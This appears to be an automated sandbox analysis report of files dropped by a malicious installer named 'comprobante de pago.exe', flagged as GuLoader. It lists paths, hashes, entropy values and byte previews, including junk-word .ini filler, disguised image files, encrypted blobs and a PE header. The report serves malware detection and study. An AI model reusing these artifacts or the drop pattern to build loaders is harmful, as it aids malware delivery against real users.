C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\Haandevendinger.ini

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	419
Entropy (8bit):	4.346873685364181
Encrypted:	false
SSDEEP:	12:EA8d4jkATOlzPRg11YNf2speXNF0cVtXhhtZsRmKI/6:EJijNOw1gf2J9F/V7Kz
MD5:	61313D818062FBFD3E759F3DAB393769
SHA1:	369870A1B8818BB8F4C4AF5D8FCC9C9133BB2131
SHA-256:	173A5EC7D69D66541B95EDC9CFB99B7FF3AF054E23A1A1E022E790E5B7D7CB4E
SHA-512:	F068828483D7F03AF89BEA92715E4AA1B791685F3D6F8E132B97A1CDD8D9DD1257A9F2CFC184F956BB29A4FE697B099B192E07407A6DFEE38AFC351B455A50A2
Malicious:	false
Preview:	Skatteen dioders depuration hjulbenede meaningless..anraaber preliterate andst.Brodiaea periscian klauber containeren silens infernalskes dobbeltdomicil..Pestilens kollektivroman synodian holochoanoida interposes langhalmen zion,isaks tib pedallers forandringsprogrammer paraphyllium....Potage autocratical ordrebgers svigefulderes udfrselsforbuddene cicero,philippian forhaabningsfuldt avians lommetrkldet inconsumed..

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\Halfman.ini

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	731
Entropy (8bit):	4.41760270489375
Encrypted:	false
SSDEEP:	12:H7mXwvgwAlwgiNUdgM+ZY/wZ2Lhwje99JRN2vJQxjNJyF3q:odH4uiMwZ2LhwjehRRNNyq
MD5:	F6AD6FD2E2FC5AC7356AE652D8959DAF
SHA1:	8C23B2232A7335BB7C3EFAFE061F4154B4D6DA22
SHA-256:	7EBB8D2B48EB1C49ABE85474DCD24BAA510AB73F8D3AEBAFD6A1E3479B58F03F
SHA-512:	3279622B160C28C6525A390065DCF03CB9119280179A7C761AF7A729E5E95741F883B51C489857573CEB3DD7A81AC90DAC6417180AD779BD89BC134776B0D5D1
Malicious:	false
Preview:	lifeskills desorientering natligt startklare monosexualities dameskrdderindernes inconsequences stockrider indifferentism udbindingens,skattefrit eksploderinger fortolkningsrkkeflgerne..Kalkulationernes englerstens trowlesworthite samtalepartnerne spegesildens artophophoria solicitrix,mediocarpal beskaering brugererfaringernes vibrant..[UDSKILLELSES UNEXCUSING]..Sejrherre penetrameter continency kvasedes byraadet citronsafters fnat brachyuranic daabsattesten....hundredal foresights prunetol paraboliform gummistvlerne krigsretters uranographist rigsblernes retreatist gennemkres,saddelmagervrkstedets kommodeskuffe groundedness afskilrer gldelse calibrating autoriserings skandskrifterne noncoplanar gungremosen succussation..

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\Mordvaabnets.jpg

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 294x157, components 3
Category:	dropped
Size (bytes):	4405
Entropy (8bit):	7.816143653060702
Encrypted:	false
SSDEEP:	96:RhOE+C0vaZ3RcYhXZ4Hn7RhYYEswDZLh8K7:LO7EFVZK7RfEseh9
MD5:	A5ACF99197FBE1E11561839DB4BBD0A6
SHA1:	E61D440B225547F0EE5F722097BD9441B3A1C6C9
SHA-256:	D8A3D0702348E691F6356AB23AD9DFCE7B52E0A7EB75E2218D2440A9EFDB600B
SHA-512:	EC0D0E8A35F5573AA2E4F5A241FF326F06592C0B876A84ED2AEEFDCC8798FFE86CE3AEDC1D948D9CC8D6F307F973C20A19B533088D8C4F125C6374DAE1B2FB82
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........&.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..C....=6..B.......z..v.d.....\|.+...\.(.L..L..O..u...t....S.ZY.v......(.j3 ...R;......j.G..2W...u...b....\...V-@.0{SL.i.".X...........ZN.=.<!.@..).kD..0.....m[6........T.&......E.LT.i1@..S.F(..S.I..J)qF(..b..b...QE.[T$.V....UU.OZ....$f.+....{..I.......P..1....O.4..'...r.h..N..H....fvI.......e..1..i...SM<..f.%[Y.n5,h.......l.]s..P....v...'.As.:...tQ.._!Trj.0.-9Vi

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\Preadmonition20.ove

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	data
Category:	dropped
Size (bytes):	254988
Entropy (8bit):	1.2647683344346683
Encrypted:	false
SSDEEP:	3072:CD35q70qe4QVPlj0y1OAvGfBwl31QKCkoWjbNtg9W+23bGCY+8fozvq630OGFo0j:HAwwbZBp8
MD5:	1FE0670D7DA023E20D5ADE9285D56C12
SHA1:	B7DD4195470223B68942C1B2DA94823C6DB8BF67
SHA-256:	C638FCE2B6A7F1CC785089F7BCEEB0ECBE3AAC672994FED54BE2EEABE14C91B1
SHA-512:	9C6CC71DF9435F039C2CBA8BE749B2366B3CCE95BFE3D5A3BD11E13ADFEE92A0DA79E10AF147959A4D72413F35454246D172F4D6D2FE74B232F7D7F009898C60
Malicious:	false
Preview:	..................I..........................................:......7..................................~..P........../...................................................................................................,............................................h....................................................7.....................0...................i......................V...............d.......0............V................................<......................................\|.>.................?....................V.............................x................P...................................................................................................X......................\|.............q."..... ........................................................i..i..e.............................A.^................................&.k....:.....L...........J......4..P......................:..............................."..................................................-.......

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\Tonation.jpg

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 578x474, components 3
Category:	dropped
Size (bytes):	21699
Entropy (8bit):	7.926675255360166
Encrypted:	false
SSDEEP:	384:Xvs9Mnh+JtrISqaH9FDkfcu+q6eo4zAoApd2GWpBED5DnfDWKh4cJwhSAEW2n:XkynIkSqanAfcu+q1/Apd2lp+DpBJwhw
MD5:	D67BCA7A20D8E99630887F04B2CF82F1
SHA1:	B83D56E948FC697398FA88DE635B8BF6683EF170
SHA-256:	97A96784FAA7D0C13326B8FC3FE600FC9CD2B7F20383B7019F3FE5892D6BF707
SHA-512:	E060EB45C0C9CEBF5A9F5A9BDD3ADA767E1FB15B24D6B7DDD4B34F40BED429DD04A4B6F0E75DF1B300851C17079F93F8D2BFA23BD1D8C00080F0A25BFDAEF75C
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........B.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(...(...(...(...(...(...(...)qL.....J)h......J)qF)..R.L.......R.P.QE-.&(.;.b...)....)qE.%.b..(.....R....\Q..J)....)...%.....%..P.QKE.%.b..)1KE.%......(..E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.....(...)h.....P.b.S.F(.....(..7.b..1@..(.....6.S.F(.1F)....Q.v(..&(...(..S.F(....?m...b....b...1N.K..n(.?.b...\S.F)..Q.v(..3.b..1@....b.P.qI.v(. ..1N.&(....I@.IKE.%........

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\Vuggevisens.tid

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	data
Category:	dropped
Size (bytes):	69623
Entropy (8bit):	1.2519681529178104
Encrypted:	false
SSDEEP:	768:ot9YUxkaybcwogonFGRoonf+GFky65/30AswsQb7g:otKUiQXg
MD5:	493AA3704B5232691C85908AF19F84E0
SHA1:	99F474E6BD3C60DAC4909CC481371C1F497C6820
SHA-256:	D33B80A108091D8BC7042D55AB4A9927432CA6F265FFBF29008BB3170093105A
SHA-512:	0D095DBCC03C8F6A35E3363287E9EEE031666C78169E8148C73288A3E1DE8DD9125970FF9435C454AA455444C4143A8DEA4C4FF8F4A32F8EE26704ED32FA91C3
Malicious:	false
Preview:	..................I.................u................;.................................................Q.......................G......................................a.............................I.........o...............................................................L.....................................................F...............................z......................................X./....................................................D...........................................................................p....................................6.............................................W...................................U.........................................Y..s....................Z......j.....................................................................................r................................................9...m........]..................................................#.................s...%.........v.................E..............

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\alderney.jpg

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 457x371, components 3
Category:	dropped
Size (bytes):	11818
Entropy (8bit):	7.847528771430427
Encrypted:	false
SSDEEP:	192:LwvFQCBGfqbL48QwHPSBnb/1nMhMBbu4SXHCjRnIfvKf1upR26SN/YQuQeKhSH:0NBZR/vEb/Z6MI44Hu2vKfcq6SP1tO
MD5:	94C27DA69D8CF7BAFED019A3FF0F5FDF
SHA1:	60EB84014299E3999B9CFFE52521AB994DA52925
SHA-256:	8B49181F164C4C0DC270CFB063507A03E6F73ADEB3242EC152291341A671EAAC
SHA-512:	C77E4C9995F959B7D125AA5D828FFBABC9A5485DC28CA1DC9D10A39C3D89A62370A1FDC1888E68F2FBD5F0E275127CA23ADF7AB7094A57EFF56EB3A9375DC736
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......s...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..J(....)h...(...(...(...(...(...(...(...(...RQ@..J\Q@.KE..QE..Rw...h.h.....Z(.Rb...(.....R.@.F)h.........b...(...(..R.1E-..J)h......J)qE.2..(.QE..QE..QE..QE..QE..QE..QIE.-%-.......(...(.....Z(.1KE..SGZu4u..QKF(.QK.1@.F)....b...LQKE.%..P.b.R.@.E-......b..\Q..m........(..S....N.%.2.(.HQE..QE..QE..QI.(.i(.-.%.(...(...(...)h.....P.E-............Q@...}._.@..Z.-...Z(.(....(...

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\assuranceselskabets.jpg

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 342x686, components 3
Category:	dropped
Size (bytes):	60376
Entropy (8bit):	7.971324380544427
Encrypted:	false
SSDEEP:	1536:7HhutAeLui+X0e2gChrxevJbvj/1BAzTIR439wd:tuyKkJCrevJX/1sMa9wd
MD5:	4C1D54C8A4903B6F12DF1A3C60D7385A
SHA1:	3B56BF989C80882528401DEDF9FF2BC7743EBC9B
SHA-256:	9E091FEF3FA9C99BB32C868CAE266CDF79A37DC9C0FA1B83A33E59FB45ABC71D
SHA-512:	34BA1AF75C53EFA42FCFD4C448D09815FA2F42228DBEAAE24DBDDC8C8492E89202C00CC9C018AC3978B8756A48A5D3749EEC9A8051E187E217DBA965B2DB2AAA
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........V.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..[X<...).%....?..ak.D...8.......R$.DbW@.. ..H.....R.....G..s.9?A..:.J..OR..Bn..VH........T....&A...J.u...=.P....n...?.d.+<r..ibO.....M%..q.&Y....G.U.d.U).)' ..3TQ.e...j.dQp.....Ej...W.....9...A\.x9.....<.w.jv.,....K.H.1YR..#''y..X..c....3..[t.%.,p...n..q....5j.....9.+*.c.U.?h..Llc.@.\|.......g..^T.'.L..=I.Y.+.1.B@.8....o...E........{..8...)..K.%.......~..

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\coater.jpg

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 278x191, components 3
Category:	dropped
Size (bytes):	8234
Entropy (8bit):	7.936187932906053
Encrypted:	false
SSDEEP:	96:RhoEpmbOFMt2NhCe+dmttdphAOr4uJiGR4pk9UQ+ZCq8+3Q7r8ymwalE24uqF65k:LoWBFzDgd0VTbJWk9UrZuRPx9u3zHoB
MD5:	A1C97C1DCC9A752FD66521B1E6E210AC
SHA1:	5E605C48AAF516EF5B952F5960005D83A3B78579
SHA-256:	A41EDF17CED3023EDC8ED596B3525621F626F94C4D4586047C68D4E82E35B308
SHA-512:	0666F8262B704E533DD3A116E670B92780A7108BEDA97D967B36D008C15D60DBCEA812F34C84CE001829C79A74E0302D3402C11B6EABDB08CE421594B5F5B6D2
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....A.dUh.p...~Y.;{io.Y#.aq.\|..=~...[H..N......#8...\.....X..i<.....Gn[i.3.{{....S.....g-?..X..<.....O..u.:..R>...Z+Z.....T.....q\........W2F..=...SR.Z.......Q..T....5(L.Wn.....;.......P...j..".W.....V..:.6s.P.....@.@.Ze=..#....n85N@f.gD.{..gL..ng..2d3@.uZ..5d:j^.k..WPEGk}..e.g...=+.T....Y.J+..!a?..c...zg..^.U..v...K.p....#.:s.[ac.q.....fn.Ui-...f....B

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\consolute.ini

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	399
Entropy (8bit):	4.362629848488066
Encrypted:	false
SSDEEP:	12:3ENyFXjSdTK8KjsY+f3tL8l3e7mWo8Y3UQVW:3LFXOasYAto8ob3hW
MD5:	58783A1CC968DD4D81913845DAD80AD0
SHA1:	B2070585C3AA6125F4EC285EE6A6C32BA28BD278
SHA-256:	9F45C639D0BCFAAB3044C4E03BFF984B5A46DC11835D1A85677EA774EB545012
SHA-512:	A10A0263B1380EE95A03365FC3CB863F123D9A575D89DCDEC147BA8D5A96E85BD48D1A5984FA0F152CBD7A45EA00A2961FD0D6FF4CFA170D6B6C206DFAA5CB5A
Malicious:	false
Preview:	[makronavnene polyphonies]..nutmeggy nonaromatically comourn dumbing.Relegeredes strop presennings concelebrations cholanthrene flskesidens..;stedordsagtige offerlammets fuldbaarnes,mannequiners testamentsvidnes ubrugeligere..Debs girokortets conceivably,katetometer potentiellernes supersuspiciousness..Benovet cornucopiate pectoris chillagite datoformater villighederne burgerbarerne terriners....

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\doughfaceism.jpg

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 350x318, components 3
Category:	dropped
Size (bytes):	15682
Entropy (8bit):	7.957732460112156
Encrypted:	false
SSDEEP:	384:6ynMlZSJIZiYUNbLtYeOmqt/h17dcrRXtvskGe8Vu0NXu:6ynr2rGHCrm8Z1CNskcRXu
MD5:	9BB75CCC92EA84FE84A6BEF65B0EBE1D
SHA1:	F182D90A8A69ABD17F87F1BFE894981A40578C41
SHA-256:	565F372185FCB22AABE2FE5D65FDA0E6D2B241296924A3A911B251510C38E206
SHA-512:	B6D05B97DC9DF1B4603D5415A68BDFE18D22DC76F9D28683227BDD330FB54E6A70E5E30AE5A31F885346CE3BD1F7773B413B29031BCC371531932C6D7E0C96E0
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......>.^.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...xj.\:...N..2pi...S.......}..O.F^Z..QJi(...R.,B.$..w.CqLy.%,..+R=...%a.?....Z..'..........CEM....3..pO@.2r......v........T....8..Y....J}..x?.f.j..>8...8o.l\.oX.$................... j.=RU....F+/O8...)5..<...q.....KY....a...<.~.....z[(.@..y..$..I.R.&.....yo.......l...{t...4.P.qC8Q..Q......@..0.0h.#..J..8..P(.....3.Z..H..<6.9<..."..m..:..5i".:T.....O?JW.<+..

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\externomedian.jpg

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 422x543, components 3
Category:	dropped
Size (bytes):	17929
Entropy (8bit):	7.897905434786395
Encrypted:	false
SSDEEP:	384:qMVi5Kz9S8zEGkVXtkMIZdeUzH/rdGLkCx7S/aTVq9cB:qMVioz9IGkVKXeUzjdGcCx
MD5:	D4D9C90B4F5144D306B262B4EE3996E7
SHA1:	82E2A0031A3EA7C52C3FCFEA73C08C927C878ECD
SHA-256:	D69D9FCE974E7C61D7E2C863781F7166F852E87D8C1D518492ED92292C38212D
SHA-512:	7A8C2BE9AD3C57449D2D0FC7D212E7B8DC926169802B59BC630FB3A1459546473166474C1214CFBC652017C187226651C491FB8A73ED80C8E00BDC9A7893FB5D
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..SO....]..A...Z..5,.YSR!.A.T.."e.v...&P....4.@..<qR7".H.v.....f....(8.T..RZ%..:.@..D.x..Q....h.M>...i.x...u.-&iM2..4..Q@.K....p.M..@.).)..-8RR.1h..4..RQ..J)..@.p.....^. ..U.}?F..:..6....V.$..2.8..7....f.M7.....L......s......o....X..n......`..x9........B...g `.c'.p.Hc.qC..........u9d.Q...0;p;b...+x..9.H...=h.f....<..q..8.N..5 5.v..R..GZ.jYH...SU...y.f...I.

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\flannels.ini

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	724
Entropy (8bit):	4.327317806978043
Encrypted:	false
SSDEEP:	12:nalWl27L/9h2ENEBrZL+3MsqQfrXdAFBCRXfrtVfjODJj9MHbYv:alrDSENEBrZLjpQD9RTKDVSbC
MD5:	E7851126AE404A3DE61B290FEA3EB31F
SHA1:	B6B4A9C983D728B8C81AB605A536E76EF305CC65
SHA-256:	3A2245179F82577B505F0BAE71742B3509600E37DAB5337FC2C20179917A3EC8
SHA-512:	508C2190B84FDE7447ECD7B60FB91289C4A781C00D7D9992957DADDC27544698FB36B3EADB4D6B8C7B34963843527CF2B6E22A9CC20F4F33315D5E24DB3582EB
Malicious:	false
Preview:	skeletonised stykvis afviklingstidernes rationaliserings konfunderes heroicomical tanghan.Padishahs reversalfejlens serieswound datadelenes farveinstallationsfiler selvbetjeningslokalernes medhjlp..nglefelt uoverlagtes tendingly costbenefitanalysers butternose skoledagene unaccordance craniopagus doorhawk mynternes defiliation,victor slikporres polonese..;prgtige morsomhedernes kabareter variegate undfangelsernes associating dommerstemmerne.Medullas filmgenrens beslave tetrazotize kalibreres sclatch pyrometry..Cavemen fasankyllinger recompass psykopater compoundable deorganization vanskbnens,udfrslernes violins trachyandesite..Natlampe bryggerens reactants udkantsomraader herls forseglinger folkelivsskildringerne..

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\fremskaff.ini

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	581
Entropy (8bit):	4.393322273477235
Encrypted:	false
SSDEEP:	12:4KXVwXAELOq2XsSxD/A3JrYFNXU1NZza06g8r8wC1mho1VaK:42V0tOq2X/I3J8NXyNZR6gTUieK
MD5:	4C6BBB918D7F854ABDB7C44590D39BD1
SHA1:	F035153459E8433BBD7FC8CA8B68869F4F09C950
SHA-256:	0C85A2CF95FD3BA21E34B761863A4FB507E3CC2FCEAC67295513907BF25C9022
SHA-512:	5F66BBD21E1A80E38430E7AC6D7CCF5B4A18DB8EA4211F55ACC988C32BA27A7E4ED6FB644B8F47F5D86B83E6118DF28A5669148846A903FD80E8992E5CA51D00
Malicious:	false
Preview:	;nonhomogeneous bathochromatism stren.Richert antiwhite slagsens segment macintosh exerciser diminuendoed..[udskrivningsproblematik chirrupy]..aargangsdeltes misdealing dichoptic akvatinte arrestationerne immensittye.Chromed havnearbejder pyroxmangite spioneredes gauche svandt..underprize transferens calvinismen brugerbehovet.Matara brugsbevgelsens strandsneglens opdagelsesrejsens jordtilliggenderne......Udrmningers nabovirksomheden massakrerer perilymphatic fjerdingvejs diachronically desmoscolecidae bilskrotning tillukningernes appeldomstolens naturfredningsforeningernes..

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Besvrliggjort.Van133

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	data
Category:	dropped
Size (bytes):	355521
Entropy (8bit):	7.668315355704074
Encrypted:	false
SSDEEP:	6144:hTTWvzFKvVMVn9jiqpJ9t5dFgf1BXzED2Bk2q2cOl:5a7FK6//h54f1NzE6B6e
MD5:	B309E0C56E116CA4BB506532D3301D26
SHA1:	DD262120AFF0DCC56CA5C142DFE9A2E0C5A754A6
SHA-256:	F32F4655AE63807AF3841E5B4F806B4CAC43CC993417FC74FF0403E8037EFA39
SHA-512:	0976FA442E5BA759922F738CC0AAD568573B88D941A6B1D5CF9B09643566B59736C69D75AD20F7B73C35BCC0F602E498C4498C32A7C3273A7E4729701FF2A1CB
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Besvrliggjort.Van133, Author: Joe Security
Preview:	........{{...................zzz.pp......66......j...v.........i.................................CCC...............................{.._............................:.................==......,,.........((.............................T..............hh.ppppp.w........................33..{.....M.............88888...y......b.......................v......(...................................................HH.cc.o.....VVVV.VV.(((......................................gggggg........::.......................................uuu....XX............i....D.AA......tt..............111....\|\|.................@@....7.U.............UUU.........4......................66666.......................QQ.........................&&&&................XXXX....,..rr.;.....5....................................OO.......jjj.......AAA.5..............[[[[...... ..s..7....yyyyy.eeeee...nn..........xx...............44.pp.......cc.)).B....NN...........'''''''........2........\......................00..............u......nnn...

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Glossologies\comprobante de pago.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	839098
Entropy (8bit):	7.574745660362048
Encrypted:	false
SSDEEP:	12288:1gP0I82X5K+GDnvy1eSLR0lUEkyZtyj6ittqTH3oEuprboHlExvyBBApy2HIxod3:EFJsDnylcpZk64oYEGc+yTARioCLC
MD5:	969DA5CC61A21E2D5FD00A52254ECD8E
SHA1:	3F3CB9FDF47343F8E4D88E5171AD3B57ED6C4BAD
SHA-256:	20DC4FFC31F978E2C822878B11A4D59C3AD6DA9898A7028D75D3C9079598DE18
SHA-512:	6DF74D8E45B5DB927D8962E453F379B18BA79DCE91A8E0677B55A36C1A57F38C43F677091D280D1ABCBCAD2B214299AEB02F2784047411E2D62A6E0912556E60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 16% Antivirus: Virustotal, Detection: 21%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1..P...P...P.._...P...P..OP.._...P..s...P...V...P..Rich.P..........PE..L....z.W.................b...*.......3............@..........................0............@.............................................`............................................................................................................text...]a.......b.................. ..`.rdata...............f..............@..@.data...8............z..............@....ndata...`...............................rsrc...`...........................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Glossologies\comprobante de pago.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Glossologies\swellfishes.ini

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	Generic INItialization configuration [ERSTATNINGERNE PRONOGRADE]
Category:	dropped
Size (bytes):	391
Entropy (8bit):	4.655897453888685
Encrypted:	false
SSDEEP:	12:G1xGvLob7CsTDzlvQDR3WFu0smqKa1MPx8QVr:WxKEnCOK3cVRjJ8QVr
MD5:	9EA503498EF15FF64A7C82CA5F52D574
SHA1:	F0C5F5A8E712B93D7C9264D6A8D6DECDADF4A270
SHA-256:	8B685B514F1FFAA676EBC57F4D2403C097FEFF95091DC5657DAD9398AEFDBA77
SHA-512:	84CEA81CA38BF2B78651DB867A2B97F77B018454547571E875F186DC9363A66218E6F7663511D52BCE7F19FE3FE69870CBB73D7882DF6A469602D1841AB75D01
Malicious:	false
Preview:	[arbejdsmaades catagenetic]..;caschielawis smsyning homopat.Vividity skkelrreders glyoxal dyrplagernes unreproached......[ERSTATNINGERNE PRONOGRADE]..ryggeslses oldies solitrplanterne toupeers gangliglia sitient cyklings auksinas amphophile tinbergen.Glemmebogens dobbie skabsgange feltprovsterne bidselspndernes deltastraalen simuleringen symbionticism netvrker magasinernes solitrskaks....

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Glossologies\trebucket.ini

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	414
Entropy (8bit):	4.289899766669852
Encrypted:	false
SSDEEP:	6:FhC4XNHNX7QM7XuQvTuLLQn8A+JY5b9lEVQpsfbmD0WKAAkCsQBM4N0CBZudGuga:FT7dXu0TqLQnYJVQObDAnXUHPBGrr
MD5:	C864F4294BC5B56B60AD69BCF408841E
SHA1:	2E4CE7FE1300E5590A29C452DFBD1BD51CC7D444
SHA-256:	ACB016DEEEAD1ED1C9D6BE0406F573D81DA854BD570D7CA409594D06A5AC953D
SHA-512:	1482F9A7E970DC53B887C3679C525EB26BF0183D20B46189F6174BBCC1C6183FE567411DF7863184E0C2D08C8F74A1DF5EF404F98B48D8FA29A39795BE1AD614
Malicious:	false
Preview:	Backgammons valdrappet bruttoetageareals,stakit ekshibitionisme relernes degradhvr annekterendes......entertainments psychiatrical anmassede hockeyspillernes antifundamentalist,overpunched stenkulsnafta desilicating rejsnings alabastron irrational efterrets udenlandsrejserne..Thigmopositive kbesummer bination rdselsfuldest unspeedy lokaliteten duchess actinopterous elegising gwennies aartusind turtledoved......

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Glossologies\underetagen.tas

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	data
Category:	dropped
Size (bytes):	413864
Entropy (8bit):	1.2564334050792323
Encrypted:	false
SSDEEP:	1536:BQbZ6McGlBAhCrD1ORROW2eOruB7QkzW3XoT3mrMK0Q9gPRKJbkLDf3hogZwiZYA:s06ozb20/Xy2iBQ6B3a
MD5:	EC566901FF4B6397B964A9CFD19413F1
SHA1:	8DDBE78E52F2CC5123DD0B559B06FAB3DD526E1C
SHA-256:	2138BD467A686F63CBFBDAA992B62A1B60AF22192285765BAA5582B7572A9DCC
SHA-512:	CF7F2FC3C4D72C9CA5F4F63A6DE24FDF136FC568CD110184D92A8E89E15DAA10A3F1759DDFF90B1EC7752DA90847E0BC3FD3015511C4F19E84A055762CCB69AA
Malicious:	false
